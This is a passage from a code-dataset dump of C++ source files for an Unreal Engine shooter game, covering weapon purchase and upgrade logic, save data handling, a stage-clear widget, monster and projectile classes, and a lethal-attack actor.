false;\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\t// Max Level 체크\n\tint32 nMag = m_pSavePlayerData->WeaponOwnData[a_nWeaponIndex].MagLevel * pWeaponTableData->WeaponData.MagUpPerLevelUp;\n\treturn (nMag >= pWeaponTableData->WeaponData.MaxMag);\n}\n\nbool APG_GameModeBase::IsAbleBuyRewardPointPower(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t\treturn false;\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\treturn (m_pSavePlayerData->m_nRewardPoint >= pWeaponTableData->CostUpgradePower);\n}\n\nbool APG_GameModeBase::IsAbleBuyRewardPointAmmo(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t\treturn false;\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\treturn (m_pSavePlayerData->m_nRewardPoint >= pWeaponTableData->CostUpgradeAmmo);\n}\n\nbool APG_GameModeBase::BuyWeapon(int32 a_nWeaponIndex)\n{\n\tm_kLastBuyErrorMsg.Empty();\n\n\tif (IsUnlockWeapon(a_nWeaponIndex))\n\t{\n\t\tABLOG(Warning, TEXT(\"The weapon has already been released. (WeaponIndex : %d)\"), a_nWeaponIndex);\n\t\tm_kLastBuyErrorMsg = TEXT(\"The weapon has already been released.\");\n\t\treturn false;\n\t}\n\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\t// 포인트 체크\n\tif (m_pSavePlayerData->m_nRewardPoint < pWeaponTableData->CostUnlock)\n\t{\n\t\tABLOG(Warning, TEXT(\"Not enough reward point. 
(RewortPoint : %d / Cost : %d)\"), m_pSavePlayerData->m_nRewardPoint, pWeaponTableData->CostUnlock);\n\t\tm_kLastBuyErrorMsg = TEXT(\"Not enough reward point.\");\n\t\treturn false;\n\t}\n\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t{\n\t\tFPGWeaponOwnData kDefalutWeaponOwnData;\n\t\tkDefalutWeaponOwnData.IsUnlock = true;\n\t\tkDefalutWeaponOwnData.MagLevel = 1;\n\t\tkDefalutWeaponOwnData.PowerLevel = 1;\n\t\tm_pSavePlayerData->WeaponOwnData.Add(a_nWeaponIndex, kDefalutWeaponOwnData);\n\t}\n\telse\n\t{\n\t\tWeaponOwnData->IsUnlock = true;\n\t}\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState, false);\n\n\tif (false == SavePlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"Data Save Error!\");\n\t\tABCHECK(false, false);\n\t}\n\n\tm_pSavePlayerData->m_nRewardPoint -= pWeaponTableData->CostUnlock;\n\n\tif (false == pMyPlayerState->InitPlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"InitPlayerData Error\");\n\t\tABCHECK(false, false);\n\t}\n\n\treturn true;\n}\n\nbool APG_GameModeBase::BuyPowerUp(int32 a_nWeaponIndex)\n{\n\tm_kLastBuyErrorMsg.Empty();\n\n\tif (false == IsUnlockWeapon(a_nWeaponIndex))\n\t{\n\t\tABLOG(Warning, TEXT(\"You have not purchased a weapon. (WeaponIndex : %d)\"), a_nWeaponIndex);\n\t\tm_kLastBuyErrorMsg = TEXT(\"You have not purchased a weapon.\");\n\t\treturn false;\n\t}\n\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\t// 포인트 체크\n\tif (false == IsAbleBuyRewardPointPower(a_nWeaponIndex))\n\t{\n\t\tABLOG(Warning, TEXT(\"Not enough reward point. (RewortPoint : %d / Cost : %d)\"), m_pSavePlayerData->m_nRewardPoint, pWeaponTableData->CostUpgradePower);\n\t\tm_kLastBuyErrorMsg = TEXT(\"Not enough reward point.\");\n\t\treturn false;\n\t}\n\n\t// Max Level 체크\n\tif (IsMaxLevelPower(a_nWeaponIndex))\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"Max Level\");\n\t\treturn false;\n\t}\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState, false);\n\n\tm_pSavePlayerData->m_nRewardPoint -= pWeaponTableData->CostUpgradePower;\n\tm_pSavePlayerData->WeaponOwnData[a_nWeaponIndex].PowerLevel += 1;\n\n\tif (false == SavePlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"Data Save Error!\");\n\t\tABCHECK(false, false);\n\t}\n\n\tif (false == pMyPlayerState->InitPlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"InitPlayerData Error\");\n\t\tABCHECK(false, false);\n\t}\n\n\treturn true;\n}\n\nbool APG_GameModeBase::BuyAmmoUp(int32 a_nWeaponIndex)\n{\n\tm_kLastBuyErrorMsg.Empty();\n\n\tif (false == IsUnlockWeapon(a_nWeaponIndex))\n\t{\n\t\tABLOG(Warning, TEXT(\"You have not purchased a weapon. 
(WeaponIndex : %d)\"), a_nWeaponIndex);\n\t\tm_kLastBuyErrorMsg = TEXT(\"You have not purchased a weapon.\");\n\t\treturn false;\n\t}\n\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\t// 포인트 체크\n\tif (false == IsAbleBuyRewardPointAmmo(a_nWeaponIndex))\n\t{\n\t\tABLOG(Warning, TEXT(\"Not enough money. (RewortPoint : %d / Cost : %d)\"), m_pSavePlayerData->m_nRewardPoint, pWeaponTableData->CostUpgradeAmmo);\n\t\tm_kLastBuyErrorMsg = TEXT(\"Not enough reward point.\");\n\t\treturn false;\n\t}\n\n\t// Max Level 체크\n\tif (IsMaxLevelAmmo(a_nWeaponIndex))\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"Max Level\");\n\t\treturn false;\n\t}\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState, false);\n\n\tm_pSavePlayerData->m_nRewardPoint -= pWeaponTableData->CostUpgradeAmmo;\n\tm_pSavePlayerData->WeaponOwnData[a_nWeaponIndex].MagLevel += 1;\n\n\tif (false == SavePlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"Data Save Error!\");\n\t\tABCHECK(false, false);\n\t}\n\n\tif (false == pMyPlayerState->InitPlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"InitPlayerData Error\");\n\t\tABCHECK(false, false);\n\t}\n\n\treturn true;\n}\n\nFString APG_GameModeBase::GetLastBuyErrorMsg()\n{\n\treturn m_kLastBuyErrorMsg;\n}\n\nint32 APG_GameModeBase::GetMaxPower(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, 0);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, 0);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tif (nullptr == pWeaponTableData)\n\t{\n\t\tABLOG(Warning, TEXT(\"%d\"), a_nWeaponIndex);\n\t}\n\tABCHECK(nullptr != pWeaponTableData, 0);\n\n\tauto pWeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponOwnData, 0);\n\n\treturn pWeaponTableData->WeaponData.BPower + ((pWeaponOwnData->PowerLevel - 1) * pWeaponTableData->WeaponData.PowerUpPerLevelUp);\n}\n\nint32 APG_GameModeBase::GetMaxAmmo(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, 0);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, 0);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, 0);\n\n\tif (0 > pWeaponTableData->WeaponData.Mag)\n\t{\n\t\t// 총알 무한 발사의 의미\n\t\treturn PG_INFINITY_AMMO;\n\t}\n\n\tauto pWeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponOwnData, 0);\n\n\treturn pWeaponTableData->WeaponData.Mag + ((pWeaponOwnData->MagLevel - 1) * pWeaponTableData->WeaponData.MagUpPerLevelUp);\n}\n\nUPG_SavePlayerData*\tAPG_GameModeBase::LoadSavePlayerData()\n{\n\tauto pSavePlayerData = Cast<UPG_SavePlayerData>(UGameplayStatics::LoadGameFromSlot(UPG_SavePlayerData::GetSlotName(), UPG_SavePlayerData::GetPlayerIndex()));\n\tif (nullptr == pSavePlayerData)\n\t\tpSavePlayerData = Cast<UPG_SavePlayerData>(UGameplayStatics::CreateSaveGameObject(UPG_SavePlayerData::StaticClass()));\n\n\treturn pSavePlayerData;\n}\n\nbool APG_GameModeBase::SavePlayerData()\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\n\tif (false == 
UGameplayStatics::SaveGameToSlot(m_pSavePlayerData, UPG_SavePlayerData::GetSlotName(), UPG_SavePlayerData::GetPlayerIndex()))\n\t{\n\t\tABLOG(Error, TEXT(\"Data Save Error!\"));\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\nUPG_SaveStageData*\tAPG_GameModeBase::LoadSaveStageData(int32 nStageID)\n{\n\tauto pSaveStageData = Cast<UPG_SaveStageData>(UGameplayStatics::LoadGameFromSlot(UPG_SaveStageData::GetSlotName(nStageID), UPG_SaveStageData::GetPlayerIndex()));\n\tif (nullptr == pSaveStageData)\n\t{\n\t\tpSaveStageData = Cast<UPG_SaveStageData>(UGameplayStatics::CreateSaveGameObject(UPG_SaveStageData::StaticClass()));\n\t\tpSaveStageData->m_nStageID = nStageID;\n\t}\n\n\treturn pSaveStageData;\n}\n\n\nbool APG_GameModeBase::SaveStageData()\n{\n\tABCHECK(nullptr != m_pSelectSaveStageData, false);\n\n\tif (false == UGameplayStatics::SaveGameToSlot(m_pSelectSaveStageData, UPG_SaveStageData::GetSlotName(m_pSelectSaveStageData->m_nStageID), UPG_SaveStageData::GetPlayerIndex()))\n\t{\n\t\tABLOG(Error, TEXT(\"Data Save Error!\"));\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\nvoid APG_GameModeBase::UpdateGameInstance(float DeltaTime)\n{\n\t// 게임 플레이 스테이지 모드에서만 처리할 수 있는 콘솔 커맨드\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->FromGameModeTick(DeltaTime);\n}" }, { "alpha_fraction": 0.697516143321991, "alphanum_fraction": 0.7039809226989746, "avg_line_length": 25.718181610107422, "blob_id": "15c54eb8e697a590793bfeb315c1a60fa81c25cd", "content_id": "9cf2069e49f3d7236cdb2f0dbf6242b0f4d76ebd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3153, "license_type": "no_license", "max_line_length": 95, "num_lines": 110, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetStageClear.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetStageClear.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetStageClear : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\tvirtual void NativeTick(const FGeometry& MyGeometry, float DeltaTime) override;\n\npublic :\n\t// 스테이지 플레이 광고 재생 가능한지 검사\n\tUFUNCTION(BlueprintCallable)\n\tbool IsAbleViewStagePlayAD();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateClearStageLayout();\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnRetry();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnGoToMainLobby();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnNextStage();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnViewAD();\n\n\t//============================================================================================\n\t// 광고 시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoSucessed();\t\t// 유저가 보상형 광고를 성공적으로 보았음 (3배 보상)\n\tUFUNCTION(BlueprintCallable)\t\n\tvoid OnADRewardVideoClosed();\t\t// 유저가 보상형 광고 보는중 닫거나 실패하였음\t(3배 보상)\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoSucessed();\t// 스테이지 플레이형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoClosed();\t// 스테이지 플레이형 광고를 닫거나 
실패하였음\n\t//============================================================================================\n\n\tUFUNCTION()\n\tvoid OnViewResultAD(bool bEnable);\n\nprivate:\n\tvoid SetBonusFlag(bool bWasClear, int32 nBonus);\n\tvoid SetBonusLethal(bool bWasClear, int32 nBonus);\n\tvoid SetBonusTime(bool bWasClear, int32 nBonus);\n\tvoid SetBonusStageClear(int32 nStageClearBonus);\n\tvoid SetBonusMonsterKill(int32 nMonsterKillBonus);\n\tvoid SetBonusStar(int32 nStarBonus);\n\tvoid SetBonusAD(bool bEnable);\n\tvoid SetBtnBonusADTime(int32 nTime);\n\tvoid SetBtnEnableAD(bool bEnable);\n\tvoid SetTotalReward(int32 nTotalReward);\n\nprivate :\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveFlag;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveFlag;\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveTime;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveTime;\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveLethal;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveLethal;\n\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusFlag;\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusLethal;\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusTime;\n\t\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusStageClear;\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusKill;\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusStar;\n\tUPROPERTY()\n\tclass UTextBlock* Text_CaptionBonusAD;\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusAD;\n\tUPROPERTY()\n\tclass UTextBlock* Text_ClearADTimer;\n\tUPROPERTY()\n\tclass UTextBlock* Text_TotalReward;\n\n\tUPROPERTY()\n\tclass UButton* m_pBtn_ViewAD;\n\n\tbool m_bWasViewStageClear3X = false;\n};\n" }, { "alpha_fraction": 0.7633587718009949, "alphanum_fraction": 0.7664121985435486, "avg_line_length": 26.29166603088379, "blob_id": "77bf9a57065daed0a5698989ce3052dd01869e14", "content_id": "2101752daecf77c1d9cdda8814b29a488882967e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1446, "license_type": "no_license", "max_line_length": 109, "num_lines": 48, "path": "/Source/Project_Gun/Public/Character/PG_MonCharDivision.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include \"PG_MonCharDivision.generated.h\"\n\n/**\n *\n */\nUCLASS()\nclass PROJECT_GUN_API APG_MonCharDivision : public APG_MonChar\n{\n\tGENERATED_BODY()\n\npublic:\n\tAPG_MonCharDivision();\n\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\npublic:\n\tbool\tIsPossibleToDivision();\t\t\t\t// 분할 가능한지 검사\n\tbool\tIsDivisionChild();\t\t\t\t\t// 자식 여부 확인\n\n\tint32\tGetDivisionCountToHPRatio();\t\t// 현재 몬스터의 남은 체력 기준, 분할 할 수 있는 횟수를 반환한다.\n\t\n\tvoid\tSetMonsterDataDivision(FPGMonsterData_Division& MonsterData_Division);\n\tconst FPGMonsterData_Division* GetMonsterDataDivision() { return &MonsterDivisionData; }\n\npublic:\n\tvirtual bool OnDamage(int32 nDamage, bool IsUseLetharAttack = false) override;\n\n\t// 스폰되면 생성된 몬스터 액터가 호출된다.\n\tvoid OnSpawnActor(APG_MonCharDivision* ASpawnActor);\n\nprotected :\n\tUPROPERTY(VisibleAnywhere, Category = \"PG MonsterComponent\")\n\tclass UPG_ComponentDivisionSpawn* DivisionSpawnComponent;\n\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG MonsterInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGMonsterData_Division MonsterDivisionData;\n\t\n\tUPROPERTY()\n\tbool 
m_bIsDivisionChild;\t// 분화형 몬스터의 자식 여부\n};\n" }, { "alpha_fraction": 0.7603423595428467, "alphanum_fraction": 0.7643366456031799, "avg_line_length": 26.606298446655273, "blob_id": "8d96d8d95efb71a1d357d77fffe8d48bcb4da058", "content_id": "a9d1f0a734abb2fd81a972692279cc10520a5d69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3689, "license_type": "no_license", "max_line_length": 204, "num_lines": 127, "path": "/Source/Project_Gun/Private/BlueScriptObject/Projectile/PG_ProjectileFlame.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Projectile/PG_ProjectileFlame.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n\nAPG_ProjectileFlame::APG_ProjectileFlame()\n{\n\tPrimaryActorTick.bCanEverTick = true;\n\n\tCollisionMeshComponent = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"COLLISIONMESHCOMPONENT\"));\n\tCollisionMeshComponent->SetupAttachment(CollisionComponent);\n\tCollisionMeshComponent->OnComponentBeginOverlap.AddDynamic(this, &APG_ProjectileFlame::OnTargetBeginOverlap);\n}\n\nvoid APG_ProjectileFlame::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tABCHECK(nullptr != CollisionMeshComponent);\n\tCollisionMeshComponent->SetCollisionProfileName(TEXT(\"Projectile\"));\n\tCollisionMeshComponent->SetGenerateOverlapEvents(true);\n}\n\nvoid APG_ProjectileFlame::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tABCHECK(nullptr != CollisionMeshComponent);\n\tCollisionMeshComponent->SetVisibility(true);\n\tCollisionMeshComponent->SetRelativeScale3D(FVector(0.0f, 0.0f, 0.0f));\n}\n\nvoid APG_ProjectileFlame::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tUpdateCollisionScale(DeltaTime);\n}\n\nvoid APG_ProjectileFlame::UpdateCollisionScale(float DeltaTime)\n{\n\tif (CollisionMeshComponent)\n\t{\n\t\tm_fScaleTime += DeltaTime;\n\n\t\t// 화염방사기 범위가 완전히 펴질때까지의 목표시간\n\t\tfloat GoalSec = 1.0f;\n\t\tif (m_fScaleTime > GoalSec)\n\t\t\tm_fScaleTime = GoalSec;\n\n\t\tfloat fScale = (m_fScaleTime / GoalSec);\n\t\tFVector vScale(fScale, fScale, fScale);// = CollisionMeshComponent->GetComponentScale();\n\t\tCollisionMeshComponent->SetRelativeScale3D(vScale);\n\t}\n}\n\nvoid APG_ProjectileFlame::FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon)\n{\n\tABCHECK(nullptr != CollisionMeshComponent);\n\tWeaponData = *pWeaponData;\n\n\tFName CollisionName = bMonsterWeapon ? 
TEXT(\"Mon_Projectile\") : TEXT(\"Projectile\");\n\tif (CollisionMeshComponent)\n\t{\n\t\tCollisionMeshComponent->SetCollisionProfileName(CollisionName);\n\t}\n\n\tvStartPos = GetActorLocation();\n}\n\nvoid APG_ProjectileFlame::SetScaleTime(float fScaleTime)\n{\n\tm_fScaleTime = fScaleTime;\n\tUpdateCollisionScale(0.0f);\n}\n\nvoid APG_ProjectileFlame::OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult)\n{\n\tauto pOwnerWeapon = Cast<APG_Weapon>(GetOwner());\n\tABCHECK(nullptr != pOwnerWeapon);\n\n\t// 몬스터 충돌시\n\tauto pMonCharacter = Cast<APG_MonChar>(OtherActor);\n\tif (pMonCharacter && IsOwnerMyPlayer())\n\t{\n\t\t// 공격 무효화 검사 (콜리전 Preset을 이용하여 벽 또는 방패 충돌 검사)\n\t\tif (false == IsAttackNullity(pMonCharacter->GetActorLocation()))\n\t\t{\n\t\t\tFCollisionQueryParams Params(NAME_None, false, pMonCharacter);\n\t\t\tif (GetWorld()->LineTraceTestByProfile(\n\t\t\t\tGetActorLocation(),\n\t\t\t\tpMonCharacter->GetActorLocation(),\n\t\t\t\tTEXT(\"Monster\"),\n\t\t\t\tParams)\n\t\t\t\t)\n\t\t\t{\n\t\t\t\t// 화염방사기에 맞았지만 그 앞에 몬스터가 서있으면 공격 무효화 처리 하도록 한다.\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tpMonCharacter->OnDamage(pOwnerWeapon->GetWeaponAttackDamage());\n\t\t}\n\t\t\n\t\treturn;\n\t}\n\t\n\t// 플레이어 충돌시\n\tauto pMyCharacter = Cast<APG_MyChar>(OtherActor);\n\tif (pMyCharacter && IsOwnerMonster())\n\t{\n\t\tif (false == IsAttackNullity(pMyCharacter->GetActorLocation()))\n\t\t{\n\t\t\tpMyCharacter->OnAttackedByMonster();\n\t\t}\n\t\treturn;\n\t}\n}\n\nvoid APG_ProjectileFlame::OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent)\n{\n\tif (false == WeaponData.Collide)\n\t\treturn;\n\n\tDestroy();\n}" }, { "alpha_fraction": 0.7924100756645203, "alphanum_fraction": 0.7946757078170776, "avg_line_length": 32.95192337036133, "blob_id": "f29118fb9284c9fbbbe188d195294bab2421d0bb", "content_id": "1d128381a74c80117155b2536aa132a1cd387682", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3877, "license_type": "no_license", "max_line_length": 195, "num_lines": 104, "path": "/Source/Project_Gun/Public/BlueScriptObject/LethalAttack/PG_LethalAttack.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Define/PG_TableData.h\"\n\n#include <GameFramework/Actor.h>\n#include \"PG_LethalAttack.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_LethalAttack : public AActor\n{\n\tGENERATED_BODY()\n\t\npublic:\t\n\t// Sets default values for this actor's properties\n\tAPG_LethalAttack();\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\npublic:\t\n\tvoid BindPlayerState(class APG_MyPlayerState* APlayerState);\n\tvoid UnBindPlayerState(class APG_MyPlayerState* APlayerState);\n\n\tvoid SetLethaAttackData(const FPGLethalAttackData* pLethalAttackData);\n\n\tbool IsReadyLethal();\t\t// 필살기를 사용할 수 있는 상태인가?\n\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid OnInitLethal();\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid OnReadyLethal();\n\t\nprotected :\n\t// 구체 콜리전 컴포넌트\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\")\n\tclass USphereComponent* 
CollisionComponent;\n\n\t// Effect shown while the lethal attack is being used.\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\")\n\tclass UParticleSystemComponent* LShowingEffect;\n\n\t// Effect played when the lethal attack is executed. The cast point is centered on the player.\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\")\n\tclass UParticleSystemComponent*\tLEffectVisual;\n\n\t// Lethal attack sound\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\")\n\tclass UAudioComponent* LethalSoundComponent;\n\nprivate :\n\t// Finds the monsters that take damage inside the lethal attack's range.\n\tbool FindingDamagedMonsters(OUT TArray<class APG_MonChar*>& GetMonsters);\n\tfloat GetAttackRange();\n\tfloat GetRatioAttackRange();\n\nprivate :\n\t//UFUNCTION(BlueprintImplementableEvent)\n\tvoid OnReadyToUseTheLethalAttack();\t\t// Ready the lethal attack\n\tvoid OnUseTheLethalAttackFail();\t\t// Lethal attack use failed\n\tvoid OnTryUseTheLethalAttack();\t\t\t// Try to use the lethal attack\n\tvoid OnAddLethalPoint(class APG_MonChar* AMonster);\t\t// Gain lethal attack points\n\n\tUFUNCTION()\n\tvoid OnEndEffectVisual(UParticleSystemComponent* ParticleSystemComponent);\t\t// Called when the effect played during the lethal attack ends\n\n\tUFUNCTION()\n\tvoid OnBegineOverlap(UPrimitiveComponent* OverlappedComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromSweep, const FHitResult& SweepResult);\t\n\n\tUFUNCTION()\n\tvoid OnParticleCollide(FName EventName, float EmitterTime, int32 ParticleTime, FVector Location, FVector Velocity, FVector Direction, FVector Normal, FName BoneName, UPhysicalMaterial* PhysMat);\n\n\tUFUNCTION()\n\tvoid OnComponentHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit);\n\nprivate :\n\t// Handles kept for removing the delegates\n\tFDelegateHandle HandleOnBasicAttackMonsterKill;\n\tFDelegateHandle HandleOnReadyToUseTheLethalAttack;\n\tFDelegateHandle HandleOnUseTheLethalAttackSuccess;\n\tFDelegateHandle HandleOnUseTheLethalAttackFail;\n\nprivate :\n\t// Lethal attack settings\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGLethalAttackData LethalAttackData;\n\n\t// Accumulated lethal attack points\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\", Meta = (AllowPrivateAccess = true))\n\tint32 LethalPoint;\n\n\t// Number of monsters killed with the lethal attack\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG LethalAttackInfo\", Meta = (AllowPrivateAccess = true))\n\tint32 MaxLethalKill;\n\n\tbool m_bReadyLethal = false;\n};\n" }, { "alpha_fraction": 0.7690972089767456, "alphanum_fraction": 0.7725694179534912, "avg_line_length": 23.510639190673828, "blob_id": "ab6774d52fdf508bf43144cf76d1273e1063fb48", "content_id": "c7065ca737a27db1502450d362cbdc794ed787b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1154, "license_type": "no_license", "max_line_length": 122, "num_lines": 47, "path": "/Source/Project_Gun/Public/Character/Component/PG_ComponentWeapon.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include 